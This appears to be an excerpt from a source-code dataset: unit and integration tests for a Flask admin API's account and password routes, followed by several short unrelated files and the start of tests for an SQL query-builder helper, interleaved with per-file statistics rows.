response = client.get("/user_account?app_key=123",
headers={"Authorization": f"Basic {credentials}"})
assert response.status_code == expected_status
assert 'user_account' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_get_account_route_no_app_key(app, client):
expected_status = 401
response = client.get("/user_account")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_get_account_route_bad_app_key(app, mocker, client):
expected_status = 401
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.side_effect = NoResultFound()
response = client.get("/user_account?app_key=BAD_KEY")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_get_account_route_unauthorized(app, mocker, client):
expected_status = 401
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.return_value = AppKey()
# mock user login
auth_mock = mocker.patch('modules.administrators.Authentication')
auth_mock.verify_password.side_effect = Unauthorized()
response = client.get("/user_account?app_key=123")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_profile_ok(app, mocker):
expected_status = 200
expected_m_length = 8
expected_m_id = 1
expected_m_username = "admin1a"
expected_m_email = "admin1a@test.com"
expected_m_first_name = "TommyA"
expected_m_last_name = "LundA"
expected_m_uri = "http://localhost/administrator/1"
expected_m_password_changed_at = None
expected_m_joined_at = None
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': expected_m_username,
'email': expected_m_email,
'first_name': expected_m_first_name,
'last_name': expected_m_last_name,
}
admin1 = Administrator()
admin1.id = 1
admin1.username = 'admin1'
admin1.email = 'admin1@test.com'
admin1.first_name = 'Tommy'
admin1.last_name = 'Lund'
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = admin1
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
db_mock = mocker.patch('modules.user_account.routes_admin.db')
db_mock.commit.return_value = None
result = put_account()
assert result[1] == expected_status
assert 'user_account' in result[0].json
assert len(result[0].json['user_account']) == expected_m_length
assert result[0].json['user_account']['id'] == expected_m_id
assert result[0].json['user_account']['username'] == expected_m_username
assert result[0].json['user_account']['email'] == expected_m_email
assert result[0].json['user_account']['first_name'] == \
expected_m_first_name
assert result[0].json['user_account']['last_name'] == expected_m_last_name
assert result[0].json['user_account']['uri'] == expected_m_uri
assert result[0].json['user_account']['password_changed_at'] == \
expected_m_password_changed_at
assert result[0].json['user_account']['joined_at'] == expected_m_joined_at
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_required_fail(app, mocker):
expected_status = 400
expected_json = {
'error': {
'username': ['Missing data for required field.'],
'email': ['Missing data for required field.'],
'first_name': ['Missing data for required field.'],
'foo': ['Unknown field.'],
'last_name': ['Missing data for required field.'],
}
}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {'foo': "bar"}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_unique_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'username': ['Value must be unique.'],
'email': ['Value must be unique.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': 'admin2',
'email': 'admin2@test.com',
'first_name': "TommyA",
'last_name': "LundA",
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.side_effect = [Administrator(), Administrator()]
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_username_numeric_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'username': ['Value must not be a number.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': '1234',
'email': 'admin1a@test.com',
'first_name': "TommyA",
'last_name': "LundA",
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_username_character_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'username': ['Value must contain only alphanumeric characters and the underscore.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': 'admin 1',
'email': 'admin1a@test.com',
'first_name': "TommyA",
'last_name': "LundA",
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_email_format_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'email': ['Not a valid email address.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': 'admin1',
'email': 'admin1atest.com',
'first_name': "TommyA",
'last_name': "LundA",
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_min_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'first_name': ['Value must be between 1 and 40 characters long.'],
'last_name': ['Value must be between 2 and 40 characters long.'],
'username': ['Value must be between 2 and 40 characters long.'],
}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': 'a',
'email': 'admin1a@test.com',
'first_name': "",
'last_name': "L",
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_max_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'first_name': ['Value must be between 1 and 40 characters long.'],
'last_name': ['Value must be between 2 and 40 characters long.'],
'username': ['Value must be between 2 and 40 characters long.'],
}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': 'Dz6RD8Rh7fj5bsPXmJDKdAPFRfcHq7NeNtjyrM9Gb',
'email': 'admin1a@test.com',
'first_name': "VTThbgrzTU8tSsD3p85LDG9Efr3twA6NvqEUVrgeq",
'last_name': "ZgtpaPWMnYYzfSvZwq9cFkMMazbVjcYbQeWQYAt4m",
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_type_fail(app, mocker):
expected_status = 400
expected_json = {
"error": {
'email': ["Not a valid email address."],
'first_name': ["Not a valid string."],
'last_name': ["Not a valid string."],
'username': ["Not a valid string."],
}
}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': 123,
'email': 123,
'first_name': 123,
'last_name': 123,
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_route_ok(app, mocker, client):
expected_status = 200
expected_m_length = 8
expected_m_id = 1
expected_m_username = "admin1a"
expected_m_email = "admin1a@test.com"
expected_m_first_name = "TommyA"
expected_m_last_name = "LundA"
expected_m_uri = "http://localhost/administrator/1"
expected_m_joined_at = None
# @todo: timezone
re_datetime = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}$")
data = {
'username': expected_m_username,
'email': expected_m_email,
'first_name': expected_m_first_name,
'last_name': expected_m_last_name,
}
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.return_value = AppKey()
# mock user login db query
role2 = Role()
role2.id = 2
role2.name = 'SUPER_ADMIN'
role2.password_reset_days = 365
admin1 = Administrator()
admin1.id = 1
admin1.username = 'admin1'
admin1.email = 'admin1@test.com'
admin1.first_name = 'Tommy'
admin1.last_name = 'Lund'
admin1.password = 'admin1pass'
admin1.roles = [role2]
db_mock = mocker.patch('modules.administrators.authentication.db')
db_mock.add.return_value = None
db_mock.commit.return_value = None
# mock login user, unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.side_effect = [admin1, None, None]
db_mock = mocker.patch('modules.user_account.routes_admin.db')
db_mock.commit.return_value = None
# mock user login
auth_mock = mocker.patch(
'modules.administrators.Authentication.is_account_locked')
auth_mock.return_value = False
credentials = base64.b64encode(
'admin1:admin1pass'.encode('ascii')).decode('utf-8')
response = client.put("/user_account?app_key=123", json=data,
headers={"Authorization": f"Basic {credentials}"})
assert response.status_code == expected_status
assert 'user_account' in response.json
assert len(response.json['user_account']) == expected_m_length
assert response.json['user_account']['id'] == expected_m_id
assert response.json['user_account']['username'] == expected_m_username
assert response.json['user_account']['email'] == expected_m_email
assert response.json['user_account']['first_name'] == \
expected_m_first_name
assert response.json['user_account']['last_name'] == expected_m_last_name
assert response.json['user_account']['uri'] == expected_m_uri
assert bool(re_datetime.match(
response.json['user_account']['password_changed_at']))
assert response.json['user_account']['joined_at'] == expected_m_joined_at
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_route_no_app_key(app, client):
expected_status = 401
response = client.put("/user_account")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_route_bad_app_key(app, mocker, client):
expected_status = 401
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.side_effect = NoResultFound()
response = client.put("/user_account?app_key=BAD_KEY")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_route_unauthorized(app, mocker, client):
expected_status = 401
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.return_value = AppKey()
# mock user login
auth_mock = mocker.patch('modules.administrators.Authentication')
auth_mock.verify_password.side_effect = Unauthorized()
response = client.put("/user_account?app_key=123")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_ok(app, mocker):
expected_status = 200
expected_m_json = {'success': 'true'}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'previous_password': "admin1pass",
'password1': "admin1Pass2",
'password2': "admin1Pass2",
}
role = Role()
role.password_policy = True
role.password_reuse_history = 10
admin1 = Administrator()
admin1.password = "admin1pass"
admin1.roles = [role]
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = admin1
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
pw_history1 = AdministratorPasswordHistory()
pw_history1.password = "$2b$04$fpn.utPgc5S3InjyWvm1auoGq/NgpG1/Cjnu6WJNNzz6AZBeUAes2"
# mock password history
query_mock.return_value \
.filter.return_value \
.order_by.return_value \
.limit.return_value \
.__iter__.return_value = [pw_history1]
db_mock = mocker.patch('modules.user_account.routes_admin.db')
db_mock.add.return_value = None
db_mock.commit.return_value = None
result = put_password()
assert result[1] == expected_status
assert result[0].json == expected_m_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_required_fail(app, mocker):
expected_status = 400
expected_json = {
'error': {
'password1': ['Missing data for required field.'],
'password2': ['Missing data for required field.'],
'previous_password': ['Missing data for required field.'],
}
}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {'foo': "bar"}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
result = put_password()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_previous_password_incorrect_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'previous_password': ['Incorrect password.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'previous_password': "bad_pass",
'password1': "admin1Pass2",
'password2': "admin1Pass2",
}
admin1 = Administrator()
admin1.password = "admin1pass"
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = admin1
result = put_password()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_password1_complexity_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'password1': ['Please choose a more complex password.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'previous_password': "admin1pass",
'password1': "password",
'password2': "password",
}
admin1 = Administrator()
admin1.password = "admin1pass"
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = admin1
result = put_password()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_password2_match_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'password2': ['New passwords must match.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'previous_password': "admin1pass",
'password1': "admin1Pass2",
'password2': "admin1Pass3",
}
admin1 = Administrator()
admin1.password = "admin1pass"
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = admin1
result = put_password()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_password_history_reuse_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'password1': ['This password has recently been used.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'previous_password': "admin1Pass",
'password1': "admin1Pass2",
'password2': "admin1Pass2",
}
role = Role()
role.password_policy = True
role.password_reuse_history = 10
admin1 = Administrator()
admin1.password = "admin1Pass"
admin1.roles = [role]
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = admin1
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
pw_history1 = AdministratorPasswordHistory()
pw_history1.password = "$2b$04$R6qjwKEIkvLLBvyfJMqjPeopGW3mz98maNA0VC9VMNkSoYGmrHaIK"
# mock password history
query_mock.return_value \
.filter.return_value \
.order_by.return_value \
.limit.return_value \
.__iter__.return_value = [pw_history1]
db_mock = mocker.patch('modules.user_account.routes_admin.db')
db_mock.add.return_value = None
db_mock.commit.return_value = None
result = put_password()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_route_ok(app, mocker, client):
expected_status = 200
expected_m_json = {'success': 'true'}
data = {
'previous_password': "admin1pass",
'password1': "admin1Pass2",
'password2': "admin1Pass2",
}
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock user login db query
role2 = Role()
role2.id = 2
role2.name = 'SUPER_ADMIN'
role2.password_reset_days = 365
role2.password_policy = True
role2.password_reuse_history = 10
admin1 = Administrator()
admin1.id = 1
admin1.password = "admin1pass"
admin1.roles = [role2]
query_mock.return_value \
.filter.return_value \
.first.return_value = admin1
db_mock = mocker.patch('modules.administrators.authentication.db')
db_mock.add.return_value = None
db_mock.commit.return_value = None
pw_history1 = AdministratorPasswordHistory()
pw_history1.password = "$2b$04$fpn.utPgc5S3InjyWvm1auoGq/NgpG1/Cjnu6WJNNzz6AZBeUAes2"
# mock password history
query_mock.return_value \
.filter.return_value \
.order_by.return_value \
.limit.return_value \
.__iter__.return_value = [pw_history1]
db_mock = mocker.patch('modules.user_account.routes_admin.db')
db_mock.add.return_value = None
db_mock.commit.return_value = None
# mock user login
auth_mock = mocker.patch(
'modules.administrators.Authentication.is_account_locked')
auth_mock.return_value = False
credentials = base64.b64encode(
'admin1:admin1pass'.encode('ascii')).decode('utf-8')
response = client.put("/user_account/password?app_key=123", json=data,
headers={"Authorization": f"Basic {credentials}"})
assert response.status_code == expected_status
assert response.status_code == expected_status
assert response.json == expected_m_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_route_no_app_key(app, client):
expected_status = 401
response = client.put("/user_account/password")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_route_bad_app_key(app, mocker, client):
expected_status = 401
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.side_effect = NoResultFound()
response = client.put("/user_account/password?app_key=BAD_KEY")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_password_route_unauthorized(app, mocker, client):
expected_status = 401
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.return_value = AppKey()
# mock user login
auth_mock = mocker.patch('modules.administrators.Authentication')
auth_mock.verify_password.side_effect = Unauthorized()
response = client.put("/user_account/password?app_key=123")
assert response.status_code == expected_status
assert 'error' in response.json
# INTEGRATION TESTS
@pytest.mark.integration
@pytest.mark.admin_api
def test_get_account_route_with_data(client):
expected_status = 200
expected_json = {
"user_account": {
"email": "admin1@test.com",
"first_name": "Tommy",
"id": 1,
"joined_at": "2018-11-01T00:00:00+0000",
"last_name": "Lund",
"password_changed_at": None,
"uri": "http://localhost/administrator/1",
"username": "admin1"
}
}
re_datetime = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\+\d{4}$")
credentials = base64.b64encode(
'admin1:admin1pass'.encode('ascii')).decode('utf-8')
response = client.get(
"/user_account?app_key=7sv3aPS45Ck8URGRKUtBdMWgKFN4ahfW",
headers={"Authorization": f"Basic {credentials}"})
assert response.status_code == expected_status
assert response.json['user_account']['email'] == \
expected_json['user_account']['email']
assert response.json['user_account']['first_name'] == \
expected_json['user_account']['first_name']
assert response.json['user_account']['id'] == \
expected_json['user_account']['id']
assert response.json['user_account']['joined_at'] == \
expected_json['user_account']['joined_at']
assert response.json['user_account']['last_name'] == \
expected_json['user_account']['last_name']
assert response.json['user_account']['uri'] == \
expected_json['user_account']['uri']
assert response.json['user_account']['username'] == \
expected_json['user_account']['username']
assert bool(re_datetime.match(
response.json['user_account']['password_changed_at']))
@pytest.mark.integration
@pytest.mark.admin_api
def test_put_account_route_with_data(client, mocker):
expected_status = 200
expected_m_length = 8
expected_m_id = 1
expected_m_username = "admin1a"
expected_m_email = "admin1a@test.com"
expected_m_first_name = "TommyA"
expected_m_last_name = "LundA"
expected_m_uri = "http://localhost/administrator/1"
expected_m_joined_at = "2018-11-01T00:00:00+0000"
re_datetime = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\+\d{4}$")
data = {
'username': expected_m_username,
'email': expected_m_email,
'first_name': expected_m_first_name,
'last_name': expected_m_last_name,
}
credentials = base64.b64encode(
'admin1:admin1pass'.encode('ascii')).decode('utf-8')
response = client.put(
"/user_account?app_key=7sv3aPS45Ck8URGRKUtBdMWgKFN4ahfW",
json=data,
headers={"Authorization": f"Basic {credentials}"})
assert response.status_code == expected_status
assert 'user_account' in response.json
assert len(response.json['user_account']) == expected_m_length
assert response.json['user_account']['id'] == expected_m_id
assert response.json['user_account']['username'] == expected_m_username
assert response.json['user_account']['email'] == expected_m_email
assert response.json['user_account']['first_name'] == \
expected_m_first_name
assert response.json['user_account']['last_name'] == expected_m_last_name
assert response.json['user_account']['uri'] == expected_m_uri
assert bool(re_datetime.match(
response.json['user_account']['password_changed_at']))
assert response.json['user_account']['joined_at'] == expected_m_joined_at
@pytest.mark.integration
@pytest.mark.admin_api
def test_put_password_route_with_data(client, mocker):
expected_status = 200
expected_m_json = {'success': 'true'}
data = {
'previous_password': "admin1pass",
'password1': "admin1Pass2",
'password2': "admin1Pass2",
}
credentials = base64.b64encode(
'admin1:admin1pass'.encode('ascii')).decode('utf-8')
response = client.put(
"/user_account/password?app_key=7sv3aPS45Ck8URGRKUtBdMWgKFN4ahfW",
json=data,
headers={"Authorization": f"Basic {credentials}"})
assert response.status_code == expected_status
assert response.json == expected_m_json
| 30.279539 | 93 | 0.683227 | 3,844 | 31,521 | 5.309053 | 0.060874 | 0.0539 | 0.047775 | 0.04851 | 0.915866 | 0.892248 | 0.879802 | 0.86863 | 0.853146 | 0.833105 | 0 | 0.020954 | 0.197583 | 31,521 | 1,040 | 94 | 30.308654 | 0.785909 | 0.031884 | 0 | 0.747688 | 0 | 0.003963 | 0.247039 | 0.113645 | 0 | 0 | 0 | 0.000962 | 0.128137 | 1 | 0.042272 | false | 0.121532 | 0.017173 | 0 | 0.059445 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
bada15884e22fc1aeebc679369f5aa3aa4a7161c | 24 | py | Python | blueprints/__init__.py | Cherimolah/TeaBot | 6c475bc70e2d71b37d613fbd4df16529d4c1d28c | [
"MIT"
] | 2 | 2021-12-26T09:31:15.000Z | 2022-02-15T17:08:19.000Z | blueprints/__init__.py | Cherimolah/TeaBot | 6c475bc70e2d71b37d613fbd4df16529d4c1d28c | [
"MIT"
] | null | null | null | blueprints/__init__.py | Cherimolah/TeaBot | 6c475bc70e2d71b37d613fbd4df16529d4c1d28c | [
"MIT"
] | null | null | null | from . import blueprint
| 12 | 23 | 0.791667 | 3 | 24 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 24 | 1 | 24 | 24 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
2400c3eaa9857d5a7936ab7334612e228b2cd05d | 233 | py | Python | {{cookiecutter.project_slug}}/src/{{cookiecutter.project_slug}}/apps/cms/models/__init__.py | sander2324/django-cookiecutter | 39b80c3a0db67a4724716184115ea095f420410c | [
"MIT"
] | null | null | null | {{cookiecutter.project_slug}}/src/{{cookiecutter.project_slug}}/apps/cms/models/__init__.py | sander2324/django-cookiecutter | 39b80c3a0db67a4724716184115ea095f420410c | [
"MIT"
] | 1 | 2021-04-13T17:12:36.000Z | 2021-04-13T17:12:43.000Z | {{cookiecutter.project_slug}}/src/{{cookiecutter.project_slug}}/apps/cms/models/__init__.py | sander2324/django-cookiecutter | 39b80c3a0db67a4724716184115ea095f420410c | [
"MIT"
] | null | null | null | from {{cookiecutter.project_slug}}.apps.cms.models.pages import * # noqa
from {{cookiecutter.project_slug}}.apps.cms.models.site_settings import * # noqa
from {{cookiecutter.project_slug}}.apps.cms.models.snippets import * # noqa
| 58.25 | 81 | 0.76824 | 31 | 233 | 5.645161 | 0.419355 | 0.274286 | 0.394286 | 0.462857 | 0.8 | 0.8 | 0.8 | 0.571429 | 0.571429 | 0 | 0 | 0 | 0.090129 | 233 | 3 | 82 | 77.666667 | 0.825472 | 0.060086 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 1 | null | null | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
24339ae85bee5fb299a1c991c211e66576f35c8b | 7,317 | py | Python | antioch/test/test_sql.py | philchristensen/antioch | 7fe27c961ae81b7655c6428038c85eefad27e980 | [
"MIT"
] | 15 | 2015-10-07T06:30:22.000Z | 2022-03-07T19:44:55.000Z | antioch/test/test_sql.py | philchristensen/antioch | 7fe27c961ae81b7655c6428038c85eefad27e980 | [
"MIT"
] | 2 | 2016-10-17T05:04:58.000Z | 2018-09-10T02:36:15.000Z | antioch/test/test_sql.py | philchristensen/antioch | 7fe27c961ae81b7655c6428038c85eefad27e980 | [
"MIT"
] | 2 | 2018-07-30T12:58:33.000Z | 2018-11-26T03:17:34.000Z | # antioch
# Copyright (c) 1999-2019 Phil Christensen
#
# See LICENSE for details
from django.test import TestCase
from antioch.util import sql
class SQLTestCase(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_interp_args_1(self):
query = sql.interp("SELECT * FROM some_table WHERE a = %s AND b = %s", 1, 'something')
expecting = "SELECT * FROM some_table WHERE a = %s AND b = %s" % (1, repr('something'))
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_interp_args_list(self):
query = sql.interp("SELECT * FROM some_table WHERE a IN %s AND b = %s", [1,2,3], 'something')
expecting = "SELECT * FROM some_table WHERE a IN (1,2,3) AND b = 'something'"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_delete(self):
query = sql.build_delete('table', {'col1':'col1_data', 'col2':'col2_data'});
expecting = "DELETE FROM table WHERE col1 = 'col1_data' AND col2 = 'col2_data'"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_delete2(self):
query = sql.build_delete('table', col1='col1_data', col2='col2_data');
expecting = "DELETE FROM table WHERE col1 = 'col1_data' AND col2 = 'col2_data'"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_insert(self):
query = sql.build_insert('table', {'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")});
expecting = "INSERT INTO table (col1, col2) VALUES (ENCRYPT('something'), 'col2_data')"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_insert2(self):
query = sql.build_insert('table', col2='col2_data', col1=sql.RAW("ENCRYPT('something')"));
expecting = "INSERT INTO table (col1, col2) VALUES (ENCRYPT('something'), 'col2_data')"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_multiple_insert(self):
query = sql.build_insert('table', [{'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")}, {'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")}]);
expecting = "INSERT INTO table (col1, col2) VALUES (ENCRYPT('something'), 'col2_data'), (ENCRYPT('something'), 'col2_data')"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_insert_dot_syntax(self):
query = sql.build_insert('db.table', {'col2':'col2_data', 'col1':sql.RAW("ENCRYPT('something')")});
expecting = "INSERT INTO db.table (col1, col2) VALUES (ENCRYPT('something'), 'col2_data')"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_insert_raw(self):
query = sql.build_insert('table', {'col2':'col2_data', 'col1':'col1_data'});
expecting = "INSERT INTO table (col1, col2) VALUES ('col1_data', 'col2_data')"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select_dot_syntax(self):
query = sql.build_select('db.table', {'t.col2':'col2_data', 's.col1':'col1_data'});
expecting = "SELECT * FROM db.table WHERE s.col1 = 'col1_data' AND t.col2 = 'col2_data'"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select(self):
query = sql.build_select('table', {'col2':'col2_data', 'col1':'col1_data'});
expecting = "SELECT * FROM table WHERE col1 = 'col1_data' AND col2 = 'col2_data'"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select2(self):
query = sql.build_select('table', col2='col2_data', col1='col1_data');
expecting = "SELECT * FROM table WHERE col1 = 'col1_data' AND col2 = 'col2_data'"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select_order(self):
query = sql.build_select('table', {'col1':'col1_data', 'col2':'col2_data', '__order_by':'id DESC'});
expecting = "SELECT * FROM table WHERE col1 = 'col1_data' AND col2 = 'col2_data' ORDER BY id DESC"
self.assertEqual(query, expecting, 'Got "%s" when expecting "%s"' % (query, expecting))
def test_build_select_distinct(self):
